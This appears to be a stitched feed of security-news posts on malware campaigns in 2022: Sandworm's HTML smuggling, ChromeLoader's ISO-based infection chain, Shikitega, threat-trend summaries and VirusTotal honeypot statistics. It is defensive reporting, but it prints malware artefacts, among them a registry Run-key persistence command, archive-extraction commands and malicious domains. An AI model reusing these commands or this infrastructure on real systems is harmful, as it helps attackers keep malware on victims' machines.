State-sponsored hackers used their infrastructure to deliver multiple malicious payloads via an HTML smuggling technique, including Colibri Loader and Warzone RAT.

“A transition from DarkCrystal RAT to Colibri Loader and Warzone RAT demonstrates UAC-0113’s broadening but continuing use of publicly available commodity malware.” reads the report published by Recorded Future.

While analyzing the C2 infrastructure Recorded Future discovered that the domain datagroup[.]ddns[.]net reported in CERT-UA’s June report on UAC-0113 was likely masquerading as the Ukrainian telecommunications company Datagroup. The domain resolved to the IP address 31[.]7[.]58[.]82, which was used to host the domain kyiv-star[.]ddns[.]net impersonating another Ukrainian telecommunications company Kyivstar.

Between July and August, the researchers noticed the use of the “ett[.]ddns[.]net” and “ett[.]hopto[.]org” domains likely used to impersonate the LLC Ukrainian telecom operator EuroTransTelecom.

The attack chain starts with spear-phishing messages, pretending to come from a Ukrainian telecommunication provider, sent to the victims in an attempt to trick them into visiting the malicious domains.

The messages are written in Ukrainian and the topics used in the attacks relate to military operations, reports, etc.

Experts noticed the presence of the same web page on multiple domains, it displays the text “ОДЕСЬКА ОБЛАСНА ВІЙСЬКОВА АДМІНІСТРАЦІЯ” which translates as “Odesa Regional Military Administration”, along with “File is downloaded automatically” in English.

Sandworm

The HTML of the webpage contains a base64-encoded ISO file that is automatically downloaded when the website is visited. The threat actors used the HTML smuggling technique. HTML smuggling is a highly evasive technique for malware delivery that leverages legitimate HTML5 and JavaScript features. The malicious payloads are delivered via encoded strings in an HTML attachment or webpage. The malicious HTML code is generated within the browser on the target device which is already inside the security perimeter of the victim’s network.  

The researchers published a report that includes details about the malware and the C2 infrastructure.

The WarZone RAT malware may be old, but it still offers powerful features like a UAC bypass, hidden remote desktop, cookie and password stealing, live keylogger, file operations, reverse proxy, remote shell (CMD), and process management.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Log4Shell)

The post Russian Sandworm APT impersonates Ukrainian telcos to deliver malware appeared first on Security Affairs.

xonasystems.com – Troubling new malware designed to facilitate attacks on a wide array of critical infrastructure – from oil refineries and power plants to water utilities and factories – is raising concerns about its…

Tweeted by @fogoros https://twitter.com/fogoros/status/1569740242101456896

excel-malware-hero.jpg

FortiGuard Labs discovered an Excel document with an embedded file name that is randomized, which exploits CVE-2017-11882 to deliver and execute malware on a victim’s device. Read our blog to learn what malware families it can download and what malicious actions it can conduct.

Executive Summary

Chromeloader proves to be an extremely prevalent and persistent malware.  It initially drops as an .iso and can be used to leak users’ browser credentials, harvest recent online activity and hijack the browser searches to display ads.  The VMware Carbon Black Managed Detection and Response (MDR) team observed the first Windows variants of Chromeloader in the wild in January 2022 and the macOS version in March 2022.

There are some variants known to ChromeLoader, including ChromeBack and Choziosi Loader.  Unit 42 researchers have found evidence of The Real First Windows Variant using the AHK(AutoHotKey) tool to compile a malicious executable and drop version 1.0 of the malware.

Although this sort of malware is created with an intent to feed adware to the user, Chromeloader also increases the attack surface of an infected system.  This can eventually lead to much more devastating attacks such as ransomware.  In this article, the VMware Carbon Black MDR team will show evidence of such attacks happening.

History

At the beginning of January 2022, the malware CS_installer was seen in the wild targeting Chrome browsers. CS_installer used ISO image file downloads and relied on user execution to initiate infection. The malware ultimately aimed to install a Chrome extension that acted as a browser hijacker, gathering personal information and tracking the user’s browsing activity.  CS_installer was also known as ChromeLoader as that was one of the names of the scheduled task the malware created. CS_Installer used a .NET executable by the same name to kick off the infection chain and install the malicious chrome extension.

CS_Installer activity died down for a bit and soon after a similar malware emerged. While this was also delivered via ISO files, there were differences in execution. This recent malware relies on a batch script in the mounted drive to install the second stage payload also delivered within the same ISO and start infection. This payload which would be the main malware file moving forward has varying names, some of the most common ones are mentioned below.

While the initial infection techniques and the contents of these two malware types are different, the objective is the same: to gather user data and track browsing activity while feeding adware. The naming convention of the scheduled tasks used by both samples to gain persistence was also very similar to Chromeloader. In addition, the coincidental timing of this second malware emerging right after CS_Installer/ChromeLoader died down would lead us to hypothesize that they are the same malware, the second variant being an evolution of the first.

Other security professionals have alluded to the similarity and possible connection between these two malware. [Link to Palo Alto & Red Canary]  We will therefore also reference the second variant as ChromeLoader as we analyze the incidents MDR has responded to in this article.

ChromeLoader Delivery

In a ChromeLoader infection, malware authors offer pirated or cracked versions of games or software.  They typically distribute this software on social media platforms, through torrents, on pirating sites, or bundled with legitimate games and software.  When the victim installs this malicious file, they unknowingly download an ISO file that contains Chromeloader and oftentimes other malware.  This Optimal Disk Image file is unable to do any harm to the machine until the victim double-clicks on the ISO and runs the Install shortcut.  The user is likely to open this file, thinking it’s a legitimate game download.

Attack Chain

The disk image is mounted as a virtual CD-ROM disk, with contents similar to the graphic below:

Once the Install shortcut is double-clicked, resources.bat executes the command: tar -xvf “app.zip” -C, extracting the contents of app.zip into “C:UsersUserNameAppDataRoaming”.

An executable is then dropped onto the user’s device. In this case bloom.exe is the executable.

Other variants are listed below:

Cash.exe
Flbmusic.exe
Opensubtitles-uploader.exe
Diet.exe
Healthy.exe
Strength.exe
Shape.exe
Energy.exe
Bloom.exe
Tone.exe

Embedded within the bloom.exe binary is nw.exe – a software component of nw.js.  The script nw.js allows developers to write native applications in HTML and JavaScript, and further allows Node.js modules to be called directly from the Document Object Model (DOM).  Its name stands for Node-Webkit and was built upon Chromium/node.js which provides application runtime to allow the executable to make successful external network connections to malicious websites.

Instances of this malware also use scheduled tasks for persistence.  A list of task names used include:

$tsn = @( “chrome window”,”chrome panel”, “chrome tab”, “chrome view”, “chrome cast”, “chrome history”, “chrome flags”, “chrome bookmarks”, “chrome conf”, “chrome storage”, “chrome tools”, “chrome settings”, “chrome support”, “chrome tele”)

The dropped archive bat files (resources.bat, configuration.bat, properties.bat) creates a RUN key to persist the malware.  It does this by unzipping various .DLL’s that are then extracted into the AppDataRoaming folder and adding registry keys as seen below:

reg add “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun” /v Bloom /t REG_SZ /d “C:Users*AppDataRoamingBloomBloom.exe –qyS7” /f

These dropped executable files were also seen attempting to harvest browser credentials.

The adware eventually executes a base64 encoded powershell script that creates and writes encoded text in the registry.  Some examples of the registry keys we’ve seen being created are:

HKCU:SoftwareLogiShdr
HKCU:SoftwareMartin Prikyrl
HKCU:SoftwareSiberSystems
HKCU:Softwareaignes
HKCU:SoftwareBinaryFortressSoftware
HKCU:SoftwareAeroTechnologies
HKCU:SoftwareLightScribe
HKCU:SoftwareZabaraKatranemiaPlc

The encoded script written to this location is executed at set intervals, making network connection to suspect domains such as:

oughsheukwa[.]autos
ukizeiasnin[.]com
lyrecomemu[.]xyz
tooblycars[.]com
texceededon[.]autos
ymenthejuiasq[.]xyz
koooblycar[.]com
rooblimyooki[.]com
Yooblygoobnku[.]com
ringhereny.autos

Soon after this powershell command is ran, the malware attempts to load the chrome extension chrome_zoom as seen in the screenshot below:

We have also seen evidence of the executables (prime.exe, bloom.exe, etc) then spawn outlook.exe to be used for data exfiltration as seen in the example below.

Evolution Timeline

Tone.exe was first seen in the wild at the end of January 2022.  This was one of the first evolutions of ChromeLoader and is mentioned in an article from Palo Alto Networks Unit 42 as Variant 2.

Following the spread of Tone.exe the VMware Carbon Black MDR team saw bloom.exe make an appearance in customer environments, beginning March 2022.  The .iso file the user downloads contains the batch script, resources.bat, which unzips the file bloom.exe.  This executable is seen making external network connections and exfiltrating sensitive data.

Since the release of the Bloom variant there have been numerous new Chromeloader renditions that follow the same attack chain and use different process names and hashes to avoid detection.  Below is a chart showing the date each variant was first detected in our customers’ environments and some of the naming conventions that were used with each variant.

Notable Variants
Opensubtitles-uploader.exe

This variant drops properties.bat instead of the previously seen resources.bat.  In the ISO archive, there is an executable named opensubtitles-uploader.exe.  OpenSubtitles is a legitimate program that helps users find subtitles for popular movies and TV shows, however, in this case, the malware author is impersonating the software by using the same name.  This executable is used in conjunction with this adware program and redirects web traffic, steals credentials, and recommends other malicious downloads posed as legitimate updates.

Similar to previous variants, tar is used to unzip the archive files.zip to the AppDataRoaming directory, followed by properties.bat adding run keys to the registry for persistence.  OpenSubtitles is also masquerading as the file nw.exe which is used in order to run JavaScript and HTML programs.

The most recent Chromeloader variants are commonly unknown and don’t appear to be malicious at a glance.  The VMware CarbonBlack MDR team has become accustomed to identifying the new chromeloader IOC’s and can stop the attack quickly.

Flbmusic.exe

This variant is typically dropped on Windows systems.  This configurations.bat file unzips the folder named files.zip which contains the executable flbmusic.exe and other various libraries and files.  Soon after, flbmusic.exe is then added to the CurrentVersionRun for persistence, followed by the executable being started.

FLB Music

Flbmusic.exe is a legitimate program for cross platform music playing.  However, the malware author is impersonating this software.  This program contains electron.exe.pdb which is a portable database used in debugging configurations for Electron.

Very similar to Chromeloaders previous versions using NW.js, Electron is a runtime that allows you to create desktop applications with HTML5, CSS, and JavaScript.  By embedding Chromium and Node.js into its binary, Electron allows attackers to load in modules that allow these applications to listen on specified ports and communicate over the network.

Electron requires you to package your app before distributing, which contains the applications’ unprotected source code. This makes it possible for application X to extract application Y and inject vulnerable scripts, without the victim knowing it. 

Evidence of Attack Escalation and Module Loading

While thought to be just a credential stealing browser hijacker, ChromeLoader has been seen in its newest variants to be delivering more malicious malware and used for other nefarious purposes.

As recent as late August, ZipBombs have been seen being dropped onto infected systems.  The ZipBomb is dropped with the initial infection in the archive the user downloads.  The user must double-click for the ZipBomb to run. Once run, the malware destroys the user’s system by overloading it with data. The ZipBomb, seen in ChromeLoader archives, is the classic and sophisticated – 42.zip, which is 42 kilobytes in size when compressed but over 40 petabytes when decompressed.  This file has been seen under the names vir.exe, very_fun_game.zip, passwords.zip, AzizGame (1).zip, nudes.zip, unreleased_songs.zip, FreeNitro.zip, jaws2018crack.zip.

Another malware included in the archive the user downloads is Enigma Ransomware.  This attack has also been seen as recent as late August 2022.  It is distributed in HTML attachments found in the archive.  When the attachment is opened, it will launch the default browser, execute its embedded javascript, and then follow its standard chain.  Names that have been seen in this attack include REG-archive.zip and KeyFILE-Generator_protected.exe.  The malware will typically drop its ransom note as readme.txt.

Another part of the infection seen is that in some cases, the attacker uses their installation servers to download and install unsecured versions of Windows.  The URLs seen include:

hXXp://ctldl[.]windowsupdate[.]com/msdownload/update/v3/static/trustedr/en/disallowedcertstl[.]cab
hXXp://ctldl[.]windowsupdate[.]com/msdownload/update/v3/static/trustedr/en/authrootstl[.]cab

More information on this can be found at Microsoft’s website.

Another software seen in the .bat downloaded by the user is Utorrent.  It is often named after cracks, movies, video games, or wallpapers.

Some names seen include:

wild.eight.v0.6.19.multi.8.cracked3dm.torrent
need for speed rivals crack v3 updated december zip
mechanic.simulator.2018.update.v1.0.4bat.torrent
Vector magic desktop edition 1.15 product key
Need for speed most wanted (2005 video game) download
evangile.w.happiness.steam.edition.rar
creed.originsfull.unlocked.part03.rar

While Utorrent itself is just a BitTorrent client for Windows, it often comes bundled with other malware that the user chooses to accept to install when asked if they accept the EULA.  Utorrent will also install the unsecured versions of Windows that have been mentioned previously.

Carbon Black Detection

Our skilled MDR analysts continuously hunt for prevalent and active threats in our customers’ environments.  Thus far we have found 50+ infected organizations that use our services.  VMware Carbon Black products prove to be very reliable when detecting and alerting on malicious behavior generated by chromeloader, our sensors pick up behaviors that many other other security vendors can’t.

Since the behaviors and tactics of this malware have changed so frequently, the majority of current IOC’s such as file hashes and C2 IPs become unreliable indicators of infection.  Our MDR analysts are highly trained to pick out malicious behavior.  Using data generated from recent attacks seen in other organizations the team is able to quickly confirm malicious behaviors and contain the threat.  MDR continues to prove that human expertise is extremely valuable to contain threats and respond in a timely manner.

Summary

It’s no surprise that this pesky adware has been one of our most frequent attacks.  This campaign has gone through many changes over the past few months, and we don’t expect it to stop.

The VMware Carbon Black MDR team is highly efficient at detecting this threat and has found that of over 50+ customers, the majority of the infected are with the business services industry, seconded by government.

In the picture above we have broken down the attack prevalence across industries and how each industry is impacted by the different executables of ChromeLoader. The majority of cases we are seeing are linked to Bloom.exe, followed by Energy.exe. It is imperative that these industries take note of the prevalence of this attack and prepare to respond to it, because as seen above ChromeLoader can lead to nastier infections.

As we’ve seen in previous Chromeloader infections, this campaign widely leverages powershell.exe and is likely to lead to more sophisticated attacks.  The Carbon Black MDR team believes this is an emerging threat that needs to be tracked and taken seriously due to its potential for delivering more nefarious malware.  It has been seen before that adware is waved off as just being a nuisance malware, however because of this, malware authors are able to take advantage and use it for wider attacks like Enigma ransomware.

It’s important to track all threats in an environment.  VMware’s Carbon Black MDR team makes this possible by tracking and responding to the threats for you and your environment.

The post The Evolution of the Chromeloader Malware appeared first on VMware Security Blog.

large.png

In the last few weeks, I’ve seen a significant uptick in systems infected with Chromeloader malware. This malware is a malicious extension for your browser, redirecting it to ad sites and hijacking searches. But with the success of this technique recently, I would not be surprised if others will take notice and switch to using it for other things. 

  

Initial infection 

 The user went to the malicious search results, where the query they searched for presented an ISO file for their search terms. Below is the results of a user that got infected 

https://alizebruisiacult[.]xyz/?cms=Mzg1ODEEDwwMCAYNDQwCAQsCDNDEDgcCDwwPAQAASQ%3D%3D&fn=Stroud%20-%20Advanced%20Engineering%20Mathematics%204e&extt=xpectthatmy.shop%2F%3Ftid%3D952736

 

C:UsersuserDownloadsStroud – Advanced Engineering Mathematics 4e.iso 

 

This ISO file contained the following files

files.zip

res.ico

Install.lnk

properties.bat

 

The user double clicked on the Properties.bat file that started the infection process.

Parent Process Name: cmd.exe

Parent Process Command Line: cmd.exe /c “”D:properties.bat” “

Process Name: tar.exe

Process Command Line arguments: tar -xvf “files.zip” -C “C:UsersuserAppDataRoaming”

They established persistence with CurrentVersionRun key.

“opensubtitles-uploader.exe “k2eN”” /f. 

HKEY_CURRENT_USERS-1-5-21-740110469-27406-3214746-20027SOFTWAREMicrosoftWindowsCurrentVersion

C:UsersuserAppDataRoamingopensubtitles-uploaderopensubtitles-uploader.exe.

Connection to some malicious domains from happened from opensubtitles-uploader.exe.

C:UsersuserAppDataRoamingopensubtitles-uploaderopensubtitles-uploader.exe.

https://alizebruisiacult[.]xyz

https://raw.githubusercontent[.]com

 

Since the infection is coming from a user mounting and executing files in an ISO, the best way to stop this is to prevent a user from mounting the ISO by double clicking. Users are still able to Burn a CD from within windows if needed. If you have power users that need to open ISOs they can use compression utilities.  

 

Mubix (Rob Fuller) has a great article about how to disable this.(1).  Below, there are two different options to prevent users from double clicking ISO file to mount them.  The GPO method is a little more complete in protections, see the article for more details. We have deployed this in my environment to end users’ desktops and have not had any issues to this point nor any new infections via this method.

 

GPO 

Computer config -> Admin Templates -> System -> Device Installation Restrictions ->  

Allow administrators to override Device Installation Restrictions Policies (enabled) 
Prevent Installation from devices that match any of these device IDs 

 Add this exact ID    

SCSICdRomMsft____Virtual_DVD-ROM_ 

 

Registry Setting 

HKEY_CLASSES_ROOTWindows.IsoFileshellmount 
Value “ProgrammaticAccessOnly” as REG_SZ 
 

(1) https://malicious.link/post/2022/blocking-iso-mounting/ 

If you have done this or something similar, let us know. 

Tom Webb

@twsecblog

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Cyberattacks are increasing in number all the time. Indeed, our 2022 Mid-Year Report revealed a 42% global year-on-year increase in attacks. And according to the World Economic Forum’s 2022 Global Risk Report, 95% of cybersecurity issues are traced back to human error. This should be a red flag for all organizations, especially with the transition…

The post The mobile malware landscape in 2022 – Of Spyware, Zero-Click attacks, Smishing and Store Security appeared first on Check Point Software.

Check Point Research reports that FormBook is the most prevalent malware, while the Android spyware Joker takes third place in the mobile index. Apache Log4j Remote Code Execution also returns to first place as the most exploited vulnerability. Our latest Global Threat Index for August 2022 reports that FormBook is now the most prevalent malware,…

The post August’s Top Malware: Emotet Knocked off Top Spot by FormBook while GuLoader and Joker Disrupt the Index appeared first on Check Point Software.

In our companion blog post, Vedere Labs analyzed the main ransomware trends we observed in the first half of 2022, including state-sponsored ransomware, new mainstream targets and evolving extortion techniques. Ransomware is the main threat targeting most organizations nowadays. However, three other notable cyberthreat trends also evolved during this period:

Threat actors – We saw an almost equal split between cybercriminals and state-sponsored actor activity, with the vast majority of malicious activity perpetrated by Russian or Eastern European actors. The main targeted sectors were government and financial services.
New malware – Significant malware families such as wipers, OT/ICS malware and botnets targeted not only IT systems but also many types of IoT devices.
Active hacking groups – Because of the ongoing conflict in Ukraine, hundreds of hacktivists perpetrated DDoS and other types of attacks. Alongside the politically motivated activity, other large groups focusing on data exfiltration for financial gains have been active.

Below we analyze each of these trends in more detail. This is not an exhaustive discussion of the current threat landscape, but rather a series of observations about the most relevant activity we have seen. As in the related ransomware post, at the end we discuss how you can bolster your current defensive strategies to account for these developments.

Cybercriminals and state-sponsored threat actors

The figures in this section are based on data from the Forescout Device Cloud, one of the world’s largest repositories of connected enterprise device data — including IT, OT and IoT device data — whose number of devices grows daily. The anonymous data comes from Forescout customer deployments and contains information about almost 19 million devices. More specifically, we look at requests to known malicious domains originating from our customer networks between January 1 and April 20, then match them to known advanced persistent threats (APTs).

Figure 1 – Malicious requests by threat actor country of origin

Figure 1 shows the percentage of malicious requests based on the threat actor’s country of origin. Russia and Eastern Europe host an overwhelming majority (83%) of the threat actors we observed, followed by China (9%) and Pakistan (5%).

We have observed in total 19 threat actors active on monitored networks in the first half of 2022. Known state-sponsored actors accounted for 53% of the activity we observed, and the remaining 47% was due to cybercriminal groups.

The top observed actors were APT29/Cozy Bear, IcedID/Lunar Spider, Evil Corp/Indrik Spider, FIN7/Carbon Spiderand Temper Panda. The first four are based in Russia while the last is based in China. The first and last are state-sponsored actors, while the three in the middle are cybercriminals.

The observed actors targeted many different sectors, as shown in Figure 2. Government networks were targeted most often (41%), followed by financial services (28%). Both sectors have long been preferred targets for cyber activities.

Figure 2 - Malicious requests by targeted sector
Figure 2 – Malicious requests by targeted sector

New malware – wipers, OT/ICS malware and botnets

Vedere Labs observes thousands of new exploit and malware samples every day, either from public sources or from attacks on our Adversary Engagement Environment, a set of publicly accessible honeypots. Most of these artifacts are variations of known malicious tools, including WannaCry samples – which is still very much active even five years after the initial infections – and exploit attempts on Log4j vulnerabilities – which have recently been declared endemicby a new DHS Cyber Safety Review Board.

The most interesting malware developments typically garner attention because of new malicious capabilities, who isdeploying the malware or whom it is targeting – and often because of a combination of the three aspects. Beyond several previously covered ransomware families, the first half of 2022 saw many new relevant malware instances.

Destructive wipers

Several wipers were used for sabotage or to destroy evidence as part of the ongoing conflict in Ukraine. This type of malware typically overwrites or encrypts either files or the master boot record (MBR)/master file table (MFT) of a system. Since their impact is similar to ransomware, often attackers disguise the malware as ransomware by adding fake ransom notes to mislead incident responders or to hide their motivations. The most interesting wiper detected so far this year was AcidRain, which was used against VIASAT KA-SAT modems on February 24, rendering more than 5,000 wind turbines in Germany unable to communicate.

OT/ICS-specific malware

OT/ICS malware continues to abuse insecure-by-design native capabilities of OT equipment. Industroyer2 and INCONTROLLER, two new samples of OT/ICS-specific malware, were disclosed to the public almost simultaneously in mid-April. Industroyer2 leverages OS-specific wipers and a dedicated module to communicate over the IEC-104 protocol for electrical substations, while the INCONTROLLER toolkit contains modules to read/write from/to ICS devices using industrial network protocols, such as OPC UA, Modbus, CODESYS and Omron FINS.

Persistent and emerging botnets

Many botnets either appeared, reappeared or became known for the first time in 2022. Emotet, one of largest botnets ever until its shutdown in 2021, returned with hundreds of thousands of new infections and was distributed in new campaigns using malicious emails. The Cyclops Blink botnet, developed by the Sandworm APT as a possible successor to VPNfilter, was active since 2019 but discovered at the beginning of this year and taken down soon after discovery. Keksec, a criminal group known for operating several botnets, such as Gafgyt and Simps, developed and open-sourced a new botnet called EnemyBot reusing code from Mirai and other botnets with several exploits for IoT devices as well as enterprise IT applications.

Remote Access Trojan (RAT)

ZuoRAT is a recent Remote Access Trojan (RAT) that leverages exposed and vulnerable routers for initial infection, enumerates IT devices connected to the network, then uses DNS and HTTP hijacking to install other malware on the identified devices. Disturbingly, this malware can automatically jump from IoT to IT assets. Researchers have speculated that it is operated by a state-sponsored group because of its complexity.

Hacking groups

Two types of hacking groups were active in the first half of 2022: hacktivists and data extortion groups. Hacktivists are mainly politically motivated, especially because of the war in Ukraine. Data extortion groups are very similar to ransomware gangs in that they focus on exfiltrating data and demanding a ransom to not release it publicly. However, they employ different malware and do not operate a ransomware-as-a-service model.

Hacktivists

More than 100 groups have conducted cyberattacks since the beginning of the Russian invasion of Ukraine. The attacks were mostly DDoS, but also included data breaches, the use of wipers and  distribution of propaganda. Some groups claimed attacks on critical infrastructure, such as disabling electric vehicle chargers in Moscow and railways in Belarus.

Most of these groups are located in Russia or Ukraine but others are in Belarus, Turkey, Romania, Poland, Portugal and Italy. They usually communicate and coordinate their actions via Twitter or Telegram. Killnet became the most notorious group, using simple DDoS tools to take down websites of critical infrastructure companies in the U.S. and Europe such as airports, banks and government agencies. They also spread propaganda to more than 100,000 members of their Telegram channel.

Data extortion groups

LAPSUS$ is a hacking group that has been active since 2021 and has breached several high-profile organizations, starting with major Brazilian governmental agencies and companies. In 2022 it moved on to global businesses such as Microsoft, Nvidia and Okta. Following a series of arrests in the UK in March, the group has been mostly silent. Of particular interest were the intensive use of stolen credentials and cooperating insiders for their hacks, as well as their strong social media presence. Other groups focusing on data extortion include RansomHouse and Karakurt. The latter is connected to the Conti ransomware gang.

Mitigation recommendations

The proliferation of IoT devices continues to expand the digital terrains of organizations, without commensurate attention to securing them. Both cybercriminals and state-sponsored actors are well aware of this. Therefore, we recommend that mitigation strategies prioritize securing the increased attack surface based on up-to-date threat intelligence.

The mitigations suggested for ransomware also apply to the threats analyzed here. Additional recommendations include:

Segment the network to isolate IT and OT, limiting network connections to only specifically allowed management and engineering workstations – thus decreasing the probability of OT/ICS malware reaching its target. Use an OT-aware DPI-capable monitoring solution to alert on malicious indicators and behaviors, watching internal systems and communications for known hostile actions.
Monitor insider threats, large data transfers and activity in dark nets to prevent or mitigate data leakage by hacktivists and data extortion groups. Monitor especially known data leaks for exposed credentials.
Use strong and unique passwords and employ multifactor authentication whenever possible to ensure that stolen credentials cannot easily be used against your organization.
Follow the NCSC-UK’s guide on Denial of Service attacks, which includes understanding weak points in your service, ensuring that service providers can handle resource exhaustion, scaling the service to handle concurrent sessions, preparing a response plan and stress testing systems regularly.
Identify and patch vulnerable IoT devices to prevent them from being used as part of DDoS botnets. Also change defaults or easily guessable passwords on these IoT devices.
Monitor the traffic of IoT devices to identify those being used as part of distributed attacks.

Besides relying on protection of assets and identification of attacks via intrusion detection, hunt for threats in your network using specific IoCs and known TTPs, such as the use of valid credentials from unknown endpoints followed by large data transfers for hacking groups.

Threat hunting and incident response

Forescout Frontline is a threat hunting, risk identification and incident response service for organizations that lack the internal resources and visibility to defend themselves from or respond to cybersecurity attacks. Forescout Frontline works in close collaboration with Vedere Labs, leveraging the intelligence we provide to identify ongoing attacks in real organizations.

[LEARN MORE]

The post Cyberthreat Trends in 2022H1: Threat Actors Observed, New Malware and Active Hacking Groups appeared first on Forescout.

serve.php?o=image&a=1296

Spyware, ransomware and cryptojacking malware have been increasingly detected on industrial control system (ICS) computers, according to data collected in the first half of 2022 by cybersecurity firm Kaspersky.

read more

It’s pretty nasty:

The malware was dubbed “Shikitega” for its extensive use of the popular Shikata Ga Nai polymorphic encoder, which allows the malware to “mutate” its code to avoid detection. Shikitega alters its code each time it runs through one of several decoding loops that AT&T said each deliver multiple attacks, beginning with an ELF file that’s just 370 bytes.

Shikitega also downloads Mettle, a Metasploit interpreter that gives the attacker the ability to control attached webcams and includes a sniffer, multiple reverse shells, process control, shell command execution and additional abilities to control the affected system.

[…]

The final stage also establishes persistence, which Shikitega does by downloading and executing five shell scripts that configure a pair of cron jobs for the current user and a pair for the root user using crontab, which it can also install if not available.

Shikitega also uses cloud hosting solutions to store parts of its payload, which it further uses to obfuscate itself by contacting via IP address instead of domain name. “Without [a] domain name, it’s difficult to provide a complete list of indicators for detections since they are volatile and they will be used for legitimate purposes in a short period of time,” AT&T said.

Bottom line: Shikitega is a nasty piece of code. AT&T recommends Linux endpoint and IoT device managers keep security patches installed, keep EDR software up to date and make regular backups of essential systems.

Another article.

Slashdot thread.

[This post was submitted by Jesse La Grew]

VirusTotal has become an important tool for researchers and defenders alike. Unusual executables or files can be uploaded to get an idea of how different antivirus vendors will classify it. Keeping the discovery of customized malware secret is also important and, in those cases, file hashes can be used to find any preexisting results. It should always be assumed that any file submitted to VirusTotal is being looked at by someone. The malware seen by public honeypots, such as the DShield honeypot, generally are not considered sensitive. Malware seen by these devices is being broadly used around the world in an attempt to compromise IoT (Internet of Things) devices. 
Examples below are from a honeypot that is configured to submit samples to VirusTotal when a new file is downloaded from or uploaded to the honeypot [3]. This helps to summarize attacks and attempt to classify the type of malware being used. A common finding is that there are very different naming conventions and results from vendor to vendor.
virustotal results
Figure 1: VirusTotal results for a file created on honeypot

Vendors With No Results

A surprising item was just how many vendors never gave any results for files seen on this honeypot. 

Acronis

Alibaba

APEX

BitDefenderFalx

Bkav

CMC

CrowdStrike

Cybereason

Cylance

eGambit

Endgame

F-Prot

Invincea

Kingsoft

Malwarebytes

Paloalto

Qihoo-360

SUPERAntiSpyware

SymantecMobileInsight

TACHYON

tehtris

TotalDefense

trapmine

Trustlook

VBA32

Webroot

Zoner

A possibility is that many of these vendors are not supplying data at this time or may not have been used in VirusTotal results in the past. These vendor lists do change over time:
•    73 Providers from date range 6/7/2022 – 7/31/2022
•    82 Providers from date range 6/7/2022 – 9/3/2022
That means in the last month, there has been an increase of 9 vendors, although this doesn’t consider any vendors that may have also been removed at this time.

Suggested Threat Results

VirusTotal will also give general threat classifications that can help to give a good high-level picture. 

VT Threat Classification

Count of  VT Threat Classification

Percentage

trojan.shell/malkey

5579

52.43%

trojan.shell/linux

3816

35.86%

downloader.bash/miraia

299

2.81%

downloader.shell

277

2.60%

trojan.linux/mirai

119

1.12%

downloader.

118

1.11%

trojan.mirai/linux

92

0.86%

downloader.bash/linux

54

0.51%

trojan.linux/shell

53

0.50%

downloader.miraia/bash

31

0.29%

Out of over 10,000 different honeypot results, files associated with malicious SSH authorized_keys were the most prevalent. Another item high on the list is Mirai, which is a popular botnet [4]. Many Mirai variants are seen on a regular basis by honeypots. Results Change Over Time We have already seen that results can be different between vendors; those vendors change and even VirusTotal threat classifications can sometimes seem inconsistent. Malware changes and new variants appear. Knowledge about this malware also changes, and this also changes the information received from a variety of tools. Looking at one example, it was seen that within a 6-hour period, the number of vendors seeing a particular hash as malware increased by 13, and the threat classification from VirusTotal also change from “trojan.mirai/linux” to “trojan.linux/mirai”.

Normalizing the stored hashes with the latest stored VirusTotal threat classification gives a different picture than seen before.

Mirai is still a significant contender for popularity but the use of creating an authorized_keys file is by far the most common. A little help came from Excel and the XLOOKUP function to gather the latest locally stored results for a particular hash [5].

Different Provider Comparisons

So far, this has only focused on suggested classifications from VirusTotal. The naming of these threats from the various vendors also differs quite a bit and we see a much different number of results.

Provider

Number of Results

No Classification

Provider Data Not Available

Total

Avast

1273

519

0

1792

AVG

1273

34

485

1792

GData

1201

591

0

1792

DrWeb

1151

641

0

1792

MicroWorld-eScan

1132

660

0

1792

Ad-Aware

1130

662

0

1792

BitDefender

1128

664

0

1792

FireEye

1117

675

0

1792

Emsisoft

1079

695

18

1792

ALYac

1030

762

0

1792

Ikarus

1021

771

0

1792

AhnLab-V3

971

821

0

1792

TrendMicro

942

850

0

1792

TrendMicro-HouseCall

941

851

0

1792

CAT-QuickHeal

915

877

0

1792

Kaspersky

796

996

0

1792

Comodo

775

1017

0

1792

Arcabit

756

1036

0

1792

Lionic

714

1078

0

1792

Avira

701

1091

0

1792

VIPRE

692

262

838

1792

Cynet

686

1077

29

1792

ESET-NOD32

628

1164

0

1792

MAX

622

1170

0

1792

Tencent

562

1230

0

1792

Microsoft

533

1257

2

1792

Fortinet

524

1239

29

1792

Cyren

523

1269

0

1792

Rising

517

1275

0

1792

McAfee-GW-Edition

501

1290

1

1792

Sophos

496

1284

12

1792

McAfee

486

1305

1

1792

Sangfor

458

1158

176

1792

Symantec

422

1039

331

1792

NANO-Antivirus

405

1387

0

1792

ZoneAlarm

305

1478

9

1792

Google

188

60

1544

1792

F-Secure

155

1637

0

1792

Antiy-AVL

121

890

781

1792

ClamAV

107

1671

14

1792

SentinelOne

94

1698

0

1792

Elastic

74

1707

11

1792

MaxSecure

72

1710

10

1792

Jiangmin

71

1721

0

1792

Avast-Mobile

70

1722

0

1792

BitDefenderTheta

59

1729

4

1792

Zillya

56

1736

0

1792

VirIT

51

1726

15

1792

ViRobot

48

1744

0

1792

Gridinsoft

23

1758

11

1792

Yandex

22

1770

0

1792

Baidu

7

1785

0

1792

Panda

5

1780

7

1792

K7AntiVirus

2

1790

0

1792

K7GW

2

1790

0

1792

CMC

0

995

797

1792

TACHYON

0

1792

0

1792

Malwarebytes

0

1774

18

1792

Trustlook

0

1792

0

1792

Zoner

0

1792

0

1792

BitDefenderFalx

0

1781

11

1792

TotalDefense

0

11

1781

1792

eGambit

0

14

1778

1792

Kingsoft

0

1783

9

1792

Acronis

0

1792

0

1792

Invincea

0

11

1781

1792

CrowdStrike

0

1792

0

1792

F-Prot

0

11

1781

1792

VBA32

0

1792

0

1792

APEX

0

1792

0

1792

tehtris

0

1777

15

1792

SUPERAntiSpyware

0

1792

0

1792

Webroot

0

1792

0

1792

SymantecMobileInsight

0

1792

0

1792

Qihoo-360

0

11

1781

1792

Cybereason

0

1671

121

1792

Endgame

0

11

1781

1792

Alibaba

0

1792

0

1792

Bkav

0

1792

0

1792

Trapmine

0

1746

46

1792

Paloalto

0

1792

0

1792

Cylance

0

1787

5

1792

This also highlights towards the end of this list vendors that did not have any results. Looking at some of the most popular providers, we also see a difference with naming of threats.

Avast Result

 Count

VirusTotal  Suggested Threats

Other:Malware-gen [Trj]

517

